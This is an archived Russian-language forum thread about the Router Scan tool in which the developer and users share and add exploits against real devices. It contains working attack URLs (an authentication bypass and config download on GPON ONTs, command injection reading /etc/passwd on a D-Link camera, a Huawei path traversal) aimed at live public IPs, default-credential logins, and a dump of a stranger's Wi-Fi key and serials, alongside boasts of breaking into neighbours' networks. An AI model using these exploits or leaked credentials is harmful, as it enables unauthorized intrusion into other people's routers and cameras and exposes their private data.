PDA

Просмотр полной версии : прога Router Scan


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16] 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

Felis-Sapiens
17.07.2017, 20:37
http://rgho.st/private/7klkKpWgk/3a5e895bc99c2657235ef3fa90490dcb

Модель: Calix T073G

...

Разница размеров конфигов - 1 байт, байт 4C и 4D тоже различаются на 1. Следовательно это что-то вроде размера чего-то.

А вторая разница (4 байта) мне неизвестна.



Это CRC32.

Написал скрипт для шифровки/расшифровки конфигурационного файла Ericsson T073G (и аналогичных ONT GPON): https://mega.nz/#!Tk4RAKSS!wsPVVhFnClBD6peImV9NeGmHT8FS1QaDTuFAzUc M2Vw

Расшифровать:


./decrypt_t073g_config.py decode ont_config.dat ont_config.xml
Зашифровать:


./decrypt_t073g_config.py encode ont_config.xml ont_config_new.dat

Lignium
17.07.2017, 20:44
Ух ты) Вы сделали мой день! Спасибо огромное! Выручили

Felis-Sapiens
17.07.2017, 22:35
Нашёл заодно уязвимость в этих ONT GPON - обход авторизации при наличии в URL какой-либо из строк: "style/", "script/", "images/", "floid.html", "FLoidForm" и т.д.

Например:


http://2.133.252.l3/wifi.html?style/
или скачиваем конфиг:


http://2.133.252.l3/download/ont_config.dat?autorun

Pebenok70
17.07.2017, 22:39
Есть точка моего же провайдера. 92.38.36.234 ZyXEL Keenetic Lite II Диапазон Ip отличный от моего. От меня не пингуется и RS соответственно его не видит. На роутер с смарта захожу.

binarymaster
17.07.2017, 22:57
Есть точка моего же провайдера. 92.38.36.234 ZyXEL Keenetic Lite II Диапазон Ip отличный от моего. От меня не пингуется и RS соответственно его не видит. На роутер с смарта захожу.



У меня не сканится.

Не исключено, что бывают такие диапазоны, просканировать которые можно лишь с определённого провайдера (как и с локальными сетями).

Pebenok70
17.07.2017, 23:06
Провайдер у нас один. С одного хаба запитаны. Вчера был на той точке 62.76.111.219, тоже не находился. У меня сейчас 62.76.107.182. Мой находится.

erwerr2321
18.07.2017, 09:53
188.134.17.77 Admin:Admin BSSID

Или это только у меня?

Felis-Sapiens
18.07.2017, 10:57
188.134.17.77 Admin:Admin BSSID

Или это только у меня?



Вроде нормально всё:

http://s8.hostingkartinok.com/uploads/thumbs/2017/07/a2071e4242d49fedfefc9ebf7300b6fa.png

https://forum.antichat.ru/threads/398971/page-189#post-4100257

exzet
18.07.2017, 17:20
пример

http://178.168.17.82:81/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd



Накрутили уже камеру, что не заходит?

pkrw88
18.07.2017, 17:54
Накрутили уже камеру, что не заходит?



Вполне себе заходит

binarymaster
18.07.2017, 21:56
нельзя-ли в новую сборку добавить камеру D-Link DCS-2121?

эксплойт

http://_IP_/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd



Мало толку от эксплойта, пароль хеширован:


auth.backend = "htdigest"
auth.backend.htdigest.userfile = "/tmp/lighttpd-htdigest.user"

http://178.168.17.82:81/cgi-bin/rtpd.cgi?cat&/tmp/lighttpd-htdigest.user

Единственная вкуснятина:

http://178.168.17.82:81/cgi-bin/rtpd.cgi?cat&/tmp/rt61sta.dat

Если есть идеи, как добыть больше инфы - велком.

exzet
18.07.2017, 22:43
Вполне себе заходит



По этой ссылке http://178.168.17.82:81/cgi-bin/rtpd.cgi?uname&-a;cat&/etc/passwd

http://savepic.ru/14880445.png

binarymaster
19.07.2017, 18:47
Забыл добавить, что если залогиниться, то по ссылке 178.168.17.82:81/common/info.cgi можно получить некоторую инфу



В принципе, после успешного логина достаточно GETнуть страницу /eng/admin/st_device.cgi, и там будет инфа в формате XML:


D-Link
DCS-2121

И тому подобное.

Эксплойт добавил.

binarymaster
21.07.2017, 11:01
На данный момент, получается только руками перебирать? А в базу как их потом добавить? У нас много их появилось.



Как только ночную сборку выпущу, так можно будет и в базу добавлять. Скорее всего уже на этих выходных будет.

Felis-Sapiens
21.07.2017, 14:01
в ночную сборку можно внести еще один эксплойт?

http://IP/system.ini?loginuse&loginpas'|xxd|less



https://forum.antichat.ru/threads/398971/page-146#post-4061013

sha9
21.07.2017, 14:04
https://forum.antichat.ru/threads/398971/page-146#post-4061013



понял.был невнимателен. пост удаляю...

binarymaster
21.07.2017, 15:54
http://savepic.ru/14980994.jpg


Я недавно фиксил все DI-524, можно в виде текста под спойлер?

С картинки вводить айпишки напрягает.

Upsurt
21.07.2017, 16:01
Я недавно фиксил все DI-524, можно в виде текста под спойлер?

С картинки вводить айпишки напрягает.



Ok

http://[email protected]:80

http://[email protected]:80

http://[email protected]:80

binarymaster
21.07.2017, 16:37
Ok



Всё парсит:

http://image.prntscr.com/image/qiBrB8QJRuaT3Xi2e_9Vbg.png

Upsurt
21.07.2017, 16:50
TOTOLINK N151RT

http://admin:[email protected]:8080

http://admin:[email protected]:80

AlexRU
21.07.2017, 23:08
binarymaster,

тут на просторах сети интернет наткнулся на сайт, где собраны эксплойты к различным маркам и моделям роутеров, не знаю видел ты его или нет, но на всякий случай ссылку напишу, глянь

http://routerpwn.com

binarymaster
21.07.2017, 23:33
http://routerpwn.com



Скидывали много раз, и не только здесь.

https://forum.antichat.ru/posts/3913143 - 2015 год

https://forum.antichat.ru/posts/3942425 - 2016 год

Там очень много всего, всё изучить невозможно. Если найдёте что-то, что можно добавить в RS (и ещё не добавлено), то добавлю.

Пользуйтесь поиском по теме.

AlexRU
21.07.2017, 23:39
Пользуйтесь поиском по теме.


да уж, точно, что то я пропарился

CRACK211
21.07.2017, 23:58
Если у кого-то есть беспроводной доступ к подобной точке доступа:


BSSID: 78:F5:FD:xx:xx:xx
ESSID: MegaFon XXXX-XXXX
Модель: Huawei (ребрендинг под Мегафон / карманный 4G модем с Wi-Fi)
Прошу отозваться. Требуется для теста новой сборки Router Scan.

Есть ли доступ к админке роутера - не важно. Я нашёл уязвимость.

http://192.168.8.1/resource/images/../../../../../var/curcfg.xml



Хотелось бы узнать удалось добавить эти чудесные модемы в rs?

vbez
22.07.2017, 08:23
Здравствуйте!по адресу 95.154.90.1:37777 есть регистратор со стандартными логин пароль admin admin при переборе router scan пароль этот не подбирает т.е. я так понимаю потому как этот тип регистраторов,камер(rvi) не добавлен в программу.есть ли возможность добавить этот тип регистраторов.и еще есть регистраторы netsurveillanceweb с серым окном авторизации с логином admin без пароля

shinZa
22.07.2017, 10:28
router scan - из названия видно что прога заточена под роутеры. По регистраторам отдельная тема.

binarymaster
22.07.2017, 12:06
Хотелось бы узнать удалось добавить эти чудесные модемы в rs?



Конкретно тот модем, который я описал в том посте - добавлен.



по адресу 95.154.90.1:37777 есть регистратор со стандартными логин пароль admin admin



Но он работает не по HTTP, а по другому протоколу. В 80 порт заходил, но по admin:admin не логинит. Так что мимо.

CRACK211
22.07.2017, 12:14
Конкретно тот модем, который я описал в том посте - добавлен.

Но он работает не по HTTP, а по другому протоколу. В 80 порт заходил, но по admin:admin не логинит. Так что мимо.



А тот другой ?

sha9
22.07.2017, 12:17
router scan - из названия видно что прога заточена под роутеры.



тем не менее он брутит и камеры. добавляются эксплойты и определения. на мой взгляд - чем больше он будет определять, тем лучше. не только камеры, но и другие вещи (как недавно bynarimaster добавил определение веб консоли сервера). роутерсплойт тоже заточен под роутеры. но это не мешает авторам добавлять в скан эксплойты на айпикамеры с маниакальным упорством. а чем роутерскан хуже?есть и должен быть лучше...

правда согласен, что толкать в роутерскан дефолтные админки вебкамер-не айс. забивать каналы ерундой. но эксплойтами..... почему-бы и нет?

binarymaster
22.07.2017, 13:10
А тот другой ?



Уже не помню. В любом случае, сейчас я готовлю ночную сборку, и в приоритете изменения интерфейса.

binarymaster
22.07.2017, 20:09
ты видишь суслика? нет ?



А он есть!

Да, это она, самая ожидаемая, новая ночная сборка с уберфичей!

http://rgho.st/8d8c4njgh



ну вы ж не выкладываете никак 58-ю сборку, ну дайте хоть потестировать.






когда звезды сойдутся хотя бы на ночную версию



#routerscan #release #nightly

muradddddd
22.07.2017, 21:02
как вам это видео роутер сканом начали злоупотреблять я не понял если скопировать все настройки роутера у обоих интернет будет?

Payer
22.07.2017, 21:09
новая ночная сборка с уберфичей!


Уберфича с автосохранением, после закрытия обнаружил папку wireless. Это экстаз!

Спасибо!

carartem02
22.07.2017, 21:34
Да, это она, самая ожидаемая, новая ночная сборка с уберфичей!

http://rgho.st/8d8c4njgh

#routerscan #release #nightly



1) Как подключится к найденной точке?

http://pix.my/o/G7LdsO?1500744635

Офк можно через винду, но не всегда точка в поле зрения

2) Мб прикрутить к таблице сгенерированный wps pin? (если шанс его прохода достаточно велик, а там уже можно юзать wps companion)

3) Брутфорс пинов был бы тоже шикарен

4) Прикрутить бы генератор паролей для некоторых точек домру (ну или вообще все алгоритмы от router keygen'a)

5) Отправка своих точек, но в каком-нибудь конфиденциальном формате? (например мне не жалко свою точку для анализа закономерностей и пр, но немного жалко пароля для всех прохожих)

6) Просто отправка точек тк порой лень подключаться, запускать RS (можно даже чтобы подключился к ним, спарсил инфу и сам отправил бы)

juart
22.07.2017, 21:45
А он есть!



кроме пробивки звездочек - ничего нового, уберфича ничего не нашла кроме ОБЩЕЙ информации о соседних точках - ни айпишек ни ключиков. Может вы чего не довыложили?

carartem02
22.07.2017, 21:47
кроме пробивки звездочек - ничего нового, уберфича ничего не нашла кроме ОБЩЕЙ информации о соседних точках - ни айпишек ни ключиков. Может вы чего не довыложили?


Шифт+ентер нажимали? Попробуй сам посканить точки (лично у меня хотя бы каждую 50 находит)

juart
22.07.2017, 22:08
Шифт+ентер нажимали? Попробуй сам посканить точки (лично у меня хотя бы каждую 50 находит)



ну наверно попробовалА не надо меня тут за дурочку держать, и есть еще один малоприятный момент - при перескане ранее найденных 4k+ точек 58-я версия пропускает больше, чем 57-я, у нее валид 610 у той 774. Где остальные то? Порт сканнер почти все видит, 3600 с лишним - RS пропускает на минимальных потоках а именно 5=10, таймаут 5800 - может надо еще больше? Но у порт сканнера таймаут только 500 и все пробивается

exzet
22.07.2017, 22:16
binarymaster, довольно годное обновление, спасибо.

Только не хватает кнопки, чтобы самому просканировать доступные сети, а не только по таймеру.



кроме пробивки звездочек - ничего нового, уберфича ничего не нашла кроме ОБЩЕЙ информации о соседних точках - ни айпишек ни ключиков. Может вы чего не довыложили?


Эм, я так понимаю, тут фича в том, чтобы получать ключики с 3wifi для точек, которые есть поблизости.

juart
22.07.2017, 22:28
лично у меня хотя бы каждую 50 находит)



нашла наконец то одну, из 22 кот. спокойно пробивает dumpper а кстати как можно эту уберфичу отключить, я боюсь как бы не потерять те точки, кот. я уже нашла и имею, роутер скан сейчас их долбит - в общем выключить галку Enable Discovery достаточно будет?

juart
22.07.2017, 22:35
binarymaster, довольно годное обновление, спасибо.

Только не хватает кнопки, чтобы самому просканировать доступные сети, а не только по таймеру.

Эм, я так понимаю, тут фича в том, чтобы получать ключики с 3wifi для точек, которые есть поблизости.



ну задумано было так, только ничего нужного не пробивается, из того чего не может dumpper Кстати вы или еще кто не знаете, стоит ждать обновлений dumpper 90.6? Уже пол-года ничего не обновлялось, каждый день жду. Как вот эта скоро стану https://scontent.cdninstagram.com/t51.2885-15/s480x480/e35/c0.62.836.836/16230434_1105716069550969_3454292920289460224_n.jp g?ig_cache_key=MTQ0NzAwNzkyNTI4MDUxODk3Mw%3D%3D.2. c

binarymaster
22.07.2017, 22:38
как вам это видео



Вполне годный обзор на Router Scan.



роутер сканом начали злоупотреблять



Спорный вопрос.



я не понял если скопировать все настройки роутера у обоих интернет будет?



В большинстве случаев - нет.



1) Как подключится к найденной точке?

http://pix.my/o/G7LdsO?1500744635

Офк можно через винду, но не всегда точка в поле зрения

2) Мб прикрутить к таблице сгенерированный wps pin? (если шанс его прохода достаточно велик, а там уже можно юзать wps companion)

3) Брутфорс пинов был бы тоже шикарен

4) Прикрутить бы генератор паролей для некоторых точек домру (ну или вообще все алгоритмы от router keygen'a)

5) Отправка своих точек, но в каком-нибудь конфиденциальном формате? (например мне не жалко свою точку для анализа закономерностей и пр, но немного жалко пароля для всех прохожих)

6) Просто отправка точек тк порой лень подключаться, запускать RS (можно даже чтобы подключился к ним, спарсил инфу и сам отправил бы)



1) Добавление профиля сети вручную

2) Нет смысла, всё равно RS не умеет соединяться по WPS PIN, пока что

3) Ну вот не надо дублировать функционал wAirCut

4) В перспективе - возможно

5) Берём отчёт RS в формате txt или csv, и редактируем по вкусу

6) Возможно будет - уже есть функция определения IP/ISP, можно будет добавить авто-скан шлюза по заданным в списке портам (если сканирование ещё не запущено)

Майкл88
22.07.2017, 22:39
Отличная обнова, спасибо) Заметил одну приятную особенность обновления: раньше начиная от 350 потоков сканирования интернет-канал практически забивался до отказа, теперь же при 1000 потоков полёт нормальный, практически без изменений)

binarymaster
22.07.2017, 22:43
Только не хватает кнопки, чтобы самому просканировать доступные сети, а не только по таймеру.



Возможно будет, хотя не представляю, куда это в интерфейсе поместить.



при перескане ранее найденных 4k+ точек 58-я версия пропускает больше, чем 57-я, у нее валид 610 у той 774. Где остальные то?



Статистика не нужна. Найдёте регрессию между 2.57 и 2.58 - айпишники в студию, только так.



нашла наконец то одну, из 22 кот. спокойно пробивает dumpper


Подключитесь к тем точкам, которые пробил Dumpper. Просканируйте их RS, если сканирует успешно - проблема не у нас.



а кстати как можно эту уберфичу отключить, я боюсь как бы не потерять те точки, кот. я уже нашла и имею, роутер скан сейчас их долбит



Бояться - в лес не ходить. Как по-вашему сканирование эфира повлечёт проблемы?



в общем выключить галку Enable Discovery достаточно будет?



Да.

binarymaster
22.07.2017, 22:49
ну задумано было так, только ничего нужного не пробивается, из того чего не может dumpper


Вам необходимо понять, что не все точки возможно добыть.

exzet
22.07.2017, 23:13
Но у порт сканнера таймаут только 500 и все пробивается



Порт сканером сканируете IP диапазоны?



кот. спокойно пробивает dumpper



Дампер уже умеет сканировать по сети?

Зы: извиняюсь, не признал вас в гриме. Вопросы снимаются. Можете пробивать роутеры порт сканером

pkrw88
22.07.2017, 23:24
Порт сканером сканируете IP диапазоны?

Дампер уже умеет сканировать по сети?

Зы: извиняюсь, не признал вас в гриме. Вопросы снимаются. Можете пробивать роутеры порт сканером


из дампера, единственное, wpswin можно было бы позаимствовать

binarymaster
22.07.2017, 23:35
из дампера, единственное, wpswin можно было бы позаимствовать



wpswin работает под Windows 7 и выше. В этом плане Jumpstart выигрывает, но там непонятные закрытые WPS API, которые я пока не копал (а вот wAirCut как раз умеет ими пользоваться).

exzet
22.07.2017, 23:47
хотя не представляю, куда это в интерфейсе поместить



А в ту же линию, где интерфейс, выбор адаптера, етц, не получится?



только ничего нужного не пробивается, из того чего не может dumpper



Во первых, вам самостоятельно следует разобраться, что за сервис 3wifi и как он работает. Если что-то не пробивается, то это исключительно из за таких "параноиков" и жадин, как вы.

Во вторых, дампер это скорее школоподелка, чем стоящий инструмент. Он не правильно определяет блокированные wps и выдает пин коды из скудной базы данных, когда RS генерирует довольно много вариантов.

К слову, с помощью генератора пинов в RS я открыл вафли у трех соседей, когда ваш любимый дампер нервно курил в сторонке. А соседку с низу, с ее tp-link'ом, я некоторое время сканировал в RS, но в итоге сбрутил хендшейк.

exzet
22.07.2017, 23:53
В этом плане Jumpstart выигрывает



Там, кстати, winpcap юзается. И если до этого дело дойдет, то можно и сканер на этом драйвере запилить

juart
23.07.2017, 00:03
Отличная обнова, спасибо) Заметил одну приятную особенность обновления: раньше начиная от 350 потоков сканирования интернет-канал практически забивался до отказа, теперь же при 1000 потоков полёт нормальный, практически без изменений)



и именно первым своим постом за 3 года вы эту радостную весть донесли до нас О май гош

juart
23.07.2017, 00:15
А в ту же линию, где интерфейс, выбор адаптера, етц, не получится?

Во первых, вам самостоятельно следует разобраться, что за сервис 3wifi и как он работает. Если что-то не пробивается, то это исключительно из за таких "параноиков" и жадин, как вы.

Во вторых, дампер это скорее школоподелка, чем стоящий инструмент. Он не правильно определяет блокированные wps и выдает пин коды из скудной базы данных, когда RS генерирует довольно много вариантов.

К слову, с помощью генератора пинов в RS я открыл вафли у трех соседей, когда ваш любимый дампер нервно курил в сторонке. А соседку с низу, с ее tp-link'ом, я некоторое время сканировал в RS, но в итоге сбрутил хендшейк.



но почему то школоподелка мне все нашла что надо, более 30 пинов и ключей по соседству, более до фига сотен во время вардрайвинга и лишь 4 точки домов по соседству я пробила пиксей, две или три хендшейками. Нееет, не смотря на все удобства RS я хочу школоподелку версии 90.7. Генератор пинов - да, согласна, помог с асусами и айроконами, там гле дамппер ошибся, а Dir-615 как дамппер так и 3wifi не берет, 3wifi почему-то их считает broadcom-ами и дает неверный пин, tp-link тоже куча не тех пинов, и это ужас, потому что у меня вблизи десятки и dir-615 и тплинков, а к ним не подберешься вообще ничемтак что не лукавьте плиз про тп-линки и соседку Жадина я? Да вы посмотрите сколько я уже точек добавила туда где один мусор со звездочками валялся, скажем по диапазонам 95.72.0.0/15; 94.253.0.0/16; мало? .

binarymaster
23.07.2017, 00:33
Dir-615 как дамппер так и 3wifi не берет, 3wifi почему-то их считает broadcom-ами и дает неверный пин, tp-link тоже куча не тех пинов, и это ужас



Всё-таки 3WiFi работает по определённым алгоритмам, заложенным в скриптах. Определение типов устройств и онлайн вычисление PIN работает на вероятностной основе, на устройствах расположенных поблизости (в линейной метрике BSSID).

Про TP-LINKи все уже давно знают, что алгоритм генерации пинов у них мало предсказуем. А что касается DIR-615, то некоторые из них вообще не принимают пин коды, даже корректные из веб интерфейса, при том что WPS включён - из собственного опыта.

sha9
23.07.2017, 01:00
не парсит длинк дир320 с дефолтным и стандартным паролем. айпи скинул в личку.

Pebenok70
23.07.2017, 01:08
46.147.208.228:80 а:а у меня не парсит.

juart
23.07.2017, 01:19
46.147.208.228:80 а:а у меня не парсит.



аналогично. начинаем ждать 59-ю ночную

sha9
23.07.2017, 01:22
во-во...началось... а я же говорил, что тараписьсься не нада..."давай новую сборку быстрей", а теперь "чет не парсит". торопили-получили. предупреждал-же, что так будет....

sha9
23.07.2017, 01:42
ну что я могу, получите мое первое одобрение


спасибо...(тут скупая мужская слеза).а то все никак заснуть не мог без одобрений ...

вот сплойт на хомгатевей и фрицбокс мне действительно сейчас нужен. вот без них точно спать не придется... а лайки только в ок и вк играют роль.тут они без надобности. тут человека оценивают не по лайкам (пардон-одобрениям)...здесь другие критерии оценки.а лайки - так... знак уважения, дружеский реверанс...бонтон т.с.

Kozloff73
23.07.2017, 02:07
добавьте Hotbox

http://37.142.83.13 admin:admin

http://37.142.83.221 admin:admin

http://37.142.83.90 admin:admin

sha9
23.07.2017, 11:54
Так ночная сборка же, считай бета-версия. Надо же кому-то тестить, иначе у binarymaster'а уйдет еще больше времени на поиск багов, чем на их исправление.


вы меня опередили. как раз и собирался написать, что не нужно ажиотажа. ночная сборка - по сути тестовая. все дружненько (кому интересно, ессесьно) скачиваем, ловим баги (поиск и предложение эксплойтов тоже приветствуется) и сообщаем разработчикам (как я понял, binarymaster не один работает над программой),которые в свою очередь по необходимости и возможности исправляют,дорабатывают, и готовят сборку к финальному релизу

binarymaster
23.07.2017, 12:16
во-во...началось... а я же говорил, что тараписьсься не нада..."давай новую сборку быстрей", а теперь "чет не парсит". торопили-получили. предупреждал-же, что так будет....



Если бы я упорно искал роутеры, которые не парсятся RS'ом, и продолжал добавлять их в поддержку, то ночная сборка так никогда бы и не вышла. Потому что их...

http://i2.kym-cdn.com/entries/icons/original/000/000/056/itsover1000.jpg

binarymaster
23.07.2017, 12:18
http://37.142.83.221 admin:admin



Отпарсился:


Address: http://37.142.83.221/
Time: 188 ms
Authorization: admin:admin
Device: Thomson/Technicolor, firmware: HOT_2.1.12
BSSID: 7C:03:4C:BA:71:0B
ESSID: Hotbox1
Security type: WPA/WPA2
Key: 0524679731
LAN IP: 192.168.1.1
WAN IP: 37.142.83.221
Domain Name Servers: 213.57.22.5 213.57.2.5
Comments: SN: HOTBX1136000155; Cable MAC: 6c:2e:85:fb:6b:c8

У вас точно последняя ночная сборка?

binarymaster
23.07.2017, 12:23
Кроме того, не парсит Boa/0.94.14rc21 (Realtek Semiconductor Corp. | WIRELESS ROUTER) вернее частично парсит: pin wpa2key но не показывает bssid, essid и не пробивает пароль на морду, хотя в принципе это почти всегда a/a. тем не менее по этой причине точки не добавляются в базу



А в прошлой сборке, они, вероятно, вообще никак не определялись. Прогресс же!

Kakoluk
23.07.2017, 13:23
Воскресный оффтоп.

Для любителей воскресного пива посвящается:

К слову сказать, RS обладает схожей "маневренностью".

sha9
23.07.2017, 13:53
Если бы я упорно искал роутеры, которые не парсятся RS'ом, и продолжал добавлять их в поддержку, то ночная сборка так никогда бы и не вышла.



я не к тому...я к этому



У меня уже накопилось очень много не добавленных, плюс ещё постоянно требуют 2.58 в личке.



вопрос не в тесте роутерскана самому.вопрос в ключевой фразе "накопилось очень много не добавленных".

RomanxD
23.07.2017, 14:24
binarymaster,

у меня есть просьба. Не могли бы выложить кусок исходника с уберфичей в разделе Delphi?

Колонки: Chn|BBSID|ESSID|Security|Level|WPS|Configured|Lock ed|WSC Name|Model

Хорошо, если ещё с рабочими компонентами они были бы, с Refresh Rate и Cumulative mode.

binarymaster
23.07.2017, 14:58
Ладно, жалко исход, так и написали бы.



Гуглите эти WinAPI:


WlanOpenHandle
WlanCloseHandle
WlanEnumInterfaces
WlanQueryInterface
WlanGetNetworkBssList
WlanGetAvailableNetworkList
WlanScan
WlanGetProfile
WlanFreeMemory
Это всё, что понадобится для реализации подобного.

1000 строк кода на дороге не валяются.

binarymaster
23.07.2017, 15:07
не парсит длинк дир320 с дефолтным и стандартным паролем. айпи скинул в личку.



Пофиксил.



http://[email protected]:161

http://[email protected]:161



Тоже пофиксил.

Кстати, у них /config.dat скачивается без авторизации, эксплойт в перспективе!

Правда логин/пароль чем-то зашифрованы:


USER_NAME="CAFOAGBLFM"
USER_PASSWORD="CAFOAGBLFM"




добавьте Hotbox

http://37.142.83.13 admin:admin

http://37.142.83.90 admin:admin



Добавил.

sha9
23.07.2017, 15:50
Правда логин/пароль чем-то зашифрованы



кстати, а нельзя-ли в роутерскан ввести такую фичу-просто пробивку на уязвимость? например, в прошлом году мы с вами говорили об убигути. там есть уязвимость(к примеру), но пароль зашифрован.вытаскивание данных сопряжено с определенными техническими трудностями в рамках одной программы. потому и не применим к роутерскану. в таком случае (допустим) роутерскан проверяет, есть-ли доступ и сообщает. если кому надо - сам вытаскивает файл и расшифровывает?

п.с. может несколько сумбурно изложил, но вы поняли о чем я... тогда можно было-бы побольше эксплойтов подключить. кстати, можно было-бы еще включить сообщение, какой эксплойт используется из базы (тех, которые с шифром). и пользователь может его использовать самостоятельно.

binarymaster
23.07.2017, 16:26
за это спасибки но вот про уберфичу я так и не поняла, чем она ВООБЩЕ отличается от



Правая кнопка мыши расскажет.

http://image.prntscr.com/image/J_DmvSD7Qra4Cfzm-orkSA.png

Ну смотрите сами, можно не только фетчить ключи сетей, но и прогонять на онлайн WPS пин, и получать диапазоны (если есть порох в пороховницах координаты в столбцах). Также удобно собирать информацию по провайдерам и внешним IP. Это вкратце.

binarymaster
23.07.2017, 16:28
кстати, а нельзя-ли в роутерскан ввести такую фичу-просто пробивку на уязвимость? например, в прошлом году мы с вами говорили об убигути. там есть уязвимость(к примеру), но пароль зашифрован.вытаскивание данных сопряжено с определенными техническими трудностями в рамках одной программы. потому и не применим к роутерскану. в таком случае (допустим) роутерскан проверяет, есть-ли доступ и сообщает. если кому надо - сам вытаскивает файл и расшифровывает?



Вряд ли что-то подобное будет. В RS нет оповещений по конкретным роутерам, есть лишь стандартная информация, категоризованная по столбцам.

binarymaster
23.07.2017, 18:42
1. Уберфича сама и без спросу коннектит к той СОХРАНЕННОЙ сети, у кот. лучше сигнал.



Нет, так делает Windows с автоматической настройкой профилей сетей.



2. Уберфича сама и без спросу помещает найденные профайлы на карту.



Нет, она получает координаты от имеющихся точек в 3WiFi. Остальные можно пробить по Ctrl+L.



3. Уберфича, чтобы найти сохраненные ключи, сама и без спросу лезет в закрытый, не редактируемый ничем кроме sysinternals



WAT?

WinAPI и ничего лишнего, никаких запросов к реестру (кроме тех, что реализованы в самих API).



Вы посмотрели функционал Jumpstart и WinPcac и внедрили в сборку.



Нельзя просто так взять и посмотреть, как работает программа с закрытым кодом.



Отключите автовыгруз в принципе, это крайне опасная функция



Для всего есть настройки.



Ограничьте количество потоков 40, а минимальный таймаут 2000, а то чувствую - долго эта затея не проживет



Люди, работающие с RSом на гигабитных серверах, вас не поймут.

juart
23.07.2017, 19:26
Нет, так делает Windows с автоматической настройкой профилей сетей.

Нет, она получает координаты от имеющихся точек в 3WiFi. Остальные можно пробить по Ctrl+L.

WAT?

WinAPI и ничего лишнего, никаких запросов к реестру (кроме тех, что реализованы в самих API).

Нельзя просто так взять и посмотреть, как работает программа с закрытым кодом.

Для всего есть настройки.

Люди, работающие с RSом на гигабитных серверах, вас не поймут.


Нет у меня никаких сохраненных профилей сетей, и никогда и ни в коем случае не бывает. вот кое-какие хвосты оставались в реестре, это моя ошибка, я ее уже исправила. Что можно пробить по ctrl-l если нет коннекта к этой конкретной сети, потому что нет ключа к ней? Сейчас попробовала и к счастью ничего не пробила. Настройки - есть, но не у всех есть мозги в голове, сервера гигабитные тоже есть у многих, а у провайдеров есть терпение, кот. рано или поздно заканчивается. Что по последнему пункту, Asus RT-N16? Как то их можно разобрать и добавить вперед всех остальных еще не добавленных?

binarymaster
23.07.2017, 19:31
Что можно пробить по ctrl-l если нет коннекта к этой конкретной сети, потому что нет ключа к ней?



Ctrl+L работает только при доступном соединении с Интернет.

И ещё иногда есть смысл сменить провайдера геолокации, если не находит.



Что по последнему пункту, Asus RT-N16?



К известным уязвимостям - не уязвим.

erwerr2321
23.07.2017, 19:40
Какие-то небылицы вы нам тут рассказываете...

binarymaster
23.07.2017, 20:13
провайдер Flex уже вырубает интернет при малейшей попытке просканить диапазон и не удаления вирусов с компьютера требует, а вызывает на ковер с паспортом и договором



Вас лично вызывали? Если нет - то это лишь слухи, не нужно им верить.

А вообще, всем известно, что сканировать того же провайдера, на котором находится роутер, к которому вы подключены, не очень безопасно. Лучше сканировать с других провайдеров (хотя не всегда эффективно).

Ещё бывает, что интернет блокируют при попытке сканирования любого диапазона, но это не так часто. Чаще просто сам роутер не выдерживает потока соединений (это касается дешёвых Онлаймовских роутеров, и подобных). Вот под ASUS'ами сканировать что-либо очень приятно.



провайдер был интересный, опять же - банки, страховые, магниты, пятерочки по всей области - все на нем практически



Я почему-то всегда был уверен, что подобное проще и быстрее найти у Энфорты.

Kakoluk
23.07.2017, 20:16
Часто в командировках нужен интернет ..



Вот именно.

Нужно, а его нет. Хочется кушать, а нечего. Хочется поговорить, а нет денег на трафф.

Снимай последние труселя, если чего то хочешь.

.. Пусть не глобально, и не во всех смыслах, но работа с RS, - уже давно не пустое занятие. Что бы злые языки не говорили.

В конце-концов, зачастую весь научно-технический прогресс делался альтруистами.(за редкими исключениями, которые подтверждали правило: мы - коллективные животные )

cheburactor
23.07.2017, 20:32
С тех пор как выставил "enable connection wathdog" только на "Ultra Fast" и хулиганю

Никаких проблем с провайдером . Всего изнутри просканировал, внаглую.

sha9
23.07.2017, 21:35
к тому же...нет ну это уже не тема, это моя находка, кот. стоит не меньше ваших 1000 строк кода.



а если хоть намекнуть о чем речь,неужели нашли убойный 0дей на ассусы?

juart
23.07.2017, 21:37
С тех пор как выставил "enable connection wathdog" только на "Ultra Fast" и хулиганю

Никаких проблем с провайдером . Всего изнутри просканировал, внаглую.



ну во-первых пока никаких, идея понятна? Во-вторых вы пропускаете на такой скорости уйму всего. В-третьих, а хотя ладно, вы не поймете и все равно будете на своем стоять.

Kakoluk
23.07.2017, 21:44
ну во-первых пока никаких, идея понятна? Во-вторых вы пропускаете на такой скорости уйму всего. В-третьих, а хотя ладно, вы не поймете и все равно будете на своем стоять.



Великолепный женский аргумент(я весь зашёлся в улыбке до ушей). - Вы не понимаете мой антилогичный бред, и посему вы дебил.

binarymaster
23.07.2017, 22:03
посмотрите, здесь нет ничего нового с асусом?

https://bierbaumer.net/security/asuswrt/



А тем временем, я добавил ещё один ASUS эксплойт CVE-2017-6549.



http://94.253.15.156:8080



Но увы, этот RT-N16 к нему неуязвим. Только у firmware 2.0 есть шансы.



Нет не меня, но не слухи, мне конечно жаль, что я подставила так человечка, но что поделать


Откуда столько информации? Вы общаетесь с людьми, чьи точки добываете?

По-моему одно из важнейших правил вардрайвера - сосед не должен знать, что ты юзаешь его Wi-Fi. В идеале сосед вообще не должен знать о твоём существовании.

Kakoluk
23.07.2017, 22:08
А тем временем, я добавил ещё один ASUS эксплойт CVE-2017-6549.

Но увы, этот RT-N16 к нему неуязвим. Только у firmware 2.0 есть шансы.



Вождь, а может полежите? Отдыхать то когда нибудь да нужно. Если так пахать, надолго вас не хватит, а вы нам нужны. Как то так.

binarymaster
23.07.2017, 22:10
Вождь, а может полежите? Отдыхать то когда нибудь да нужно. Если так пахать, надолго вас не хватит, а вы нам нужны. Как то так.


Да тут попробуй полежать... устройства-то скидывают, кто сюда, кто в личку.

А мне бы ещё переключиться на пару проектов...

Kakoluk
23.07.2017, 22:19
Да тут попробуй полежать... устройства-то скидывают, кто сюда, кто в личку.

А мне бы ещё переключиться на пару проектов...


Боже мой.(чего я удивляюсь, это и так ясно)

Но всё же, может отдых?(на пару недель, всё равно всё в жизни не успеть).

Если мы потерям ведущих программистов, тем более идейных, если не выдержит их физическая оболочка.. это будет невосполнимая потеря.

juart
23.07.2017, 22:21
Великолепный женский аргумент(я весь зашёлся в улыбке до ушей). - Вы не понимаете мой антилогичный бред, и посему вы дебил.


ну я этого не говорила прямо может быть еще один вариант, понимает, но сделает по своему на том основании, что мужчина. А что же в моем посте антилогичного?

sha9
23.07.2017, 22:22
А мне бы ещё переключиться на пару проектов...


